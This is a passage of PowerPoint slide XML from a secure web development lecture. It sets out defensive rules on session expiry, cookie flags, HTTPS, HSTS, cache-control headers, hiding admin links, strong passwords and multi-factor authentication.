          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expire/delete state information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session tokens, cookies, (whatever) should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be DESTROYED at logoff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Including Window Close events – force logoff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physically removed from server side databases, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reasonable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“automatic” expirations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should become “invalid” after a reasonably short amount of time EVEN IF not logged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(gone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to lunch or home for the day w/o logging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>off, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idle timeout, absolute timeout, renewal timeout, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Login timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to ALL tokens/cookies!! (may be several…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3510540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#5 (A2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect your cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"secure" and "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" flags for session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure cookies requires HTTPS, so run your pages using HTTPS…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>blocks cookie access for JavaScript – can help foil request forging/session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SessionIDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be in cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42354009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Rule #6 (A2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use HTTPS for –ALL– sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Including FORMS and “display” pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Including ALL login/credential pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use FOR ALL wireless access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36484728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#7 (A2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not cache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inhibit cache for all browsers, you need to set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cache-Control: no-cache, no-store, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>must-revalidate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pragma: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no-cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expires: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Response.AppendHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("Cache-Control", "no-cache, no-store, must-revalidate"); // HTTP 1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1493291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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NET (cont’d)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Response.AppendHeader("Pragma", "no-cache"); // HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Response.AppendHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("Expires", "0"); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;meta http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="Cache-Control" content="no-cache, no-store, must-revalidate" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;meta http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="Pragma" content="no-cache" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;meta http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="Expires" content="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34928090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#7 (cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Strict Transport Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(modern) Browser enforces https – will reject non-https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Helps mitigate man-in-the-middle attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specified via an HTTP header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All session traffic received after this header will be automatically directed as “https” by the (conforming) browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19312988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#8 (A4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="8153400" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>links to test/admin from “normal” web app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There should be NO links from un-authorized pages to authorized pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The only access to test or admin assets from a “normal” code page should be by manually entering the URL of the asset – NOT via a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A link just tells attackers where to look…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that search engines and other scanners will not find these pages…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18697129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#9 (A2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Longer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>passwords are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>safer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Current recommendation is 10-12 character minimum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Require multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>classes of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a larger “alphabet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Increases number of potential passwords; slows “brute force” attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.owasp.org/index.php/Authentication_Cheat_Sheet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14333643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9 (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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905000"/>
            <a:ext cx="3908425" cy="401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162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Face of Attacks - 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“New school”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many are backed by organized crime or foreign intelligence units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large sums of money at stake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Higher payoffs leads to more and more sophisticated attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large costs to site owners, and sometimes their customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additional costs beyond actual $$ fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, et al)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14368493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#9 (cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Safer password is one that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is composed of at least 10 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contains upper, lower, numeric, and special chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does NOT contain any dictionary words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IS NOT on any “common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>password lists”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1692846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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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133600"/>
            <a:ext cx="3152775"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329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#9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider MFA	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multi Factor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can use smart phones, tokens, fingerprint, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relatively cheap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Much stronger authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1329708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#10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>accidentally leak any </a:t>
            </a:r>
            <a:r>
